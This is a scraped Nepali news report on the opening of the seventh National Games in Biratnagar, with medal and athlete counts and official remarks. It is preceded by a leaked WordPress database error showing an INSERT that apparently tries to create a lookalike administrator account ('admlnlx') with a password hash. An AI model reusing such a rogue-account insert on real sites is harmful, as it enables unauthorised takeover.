WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B5woSwAGiThMODBW0sgw4da6DNJ3A./', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 18:03:36', '', 'admlnlx', 'admlnlx')
विराटनगर, पुस ८ –
सातौँ राष्ट्रिय खेलकुद शुक्रबारदेखि पूर्वाञ्चलमा सुरु हुँदैछ । एक हप्तासम्म हुने प्रतियोगितामा विभिन्न ३५ खेलमा २९४ स्वर्ण, २९४ रजत र ४४७ कास्य गरी एक हजार ३५ पदकका लागि प्रतिस्पर्धा हुनेछ । पदका लागि तीन हजार ९७२ जना खेलाडीको सहभागिता रहने आयोजकले जनाएको छ ।
युवा तथा खेलकुदमन्त्री दलजीत श्रीपाइलीले प्रतिभावान खेलाडीको खोजीमा सातौ राष्ट्रिय खेलकुदले महत्वपूर्ण भूमिका निर्वाह गर्ने विश्वास व्यक्त गर्नुभएको छ । उहाँले सन् २०१९ मा नेपालमा हुने सार्क खेलकुदमा उत्कृष्ट प्रदर्शन गर्ने खेलाडी छनौट गर्नमा पनि यो प्रतियोगिता उपयोगी हुने बताउनुभयो ।
राष्ट्रपति विद्यादेवी भण्डारीले प्रतियोगिताको विराटनगरको सहिद रङ्गशालामा एक भव्य समारोहबिच उद्घाटन गर्नुहुने कार्यक्रम छ ।प्रतियोगितामा सहभागी हुन खेलाडी र प्रशिक्षकलगायत विराटनगर आउनेक्रम जारी रहेको र सबै तयारी पूरा भइसकेको आयोजक समितिले जनाएको छ ।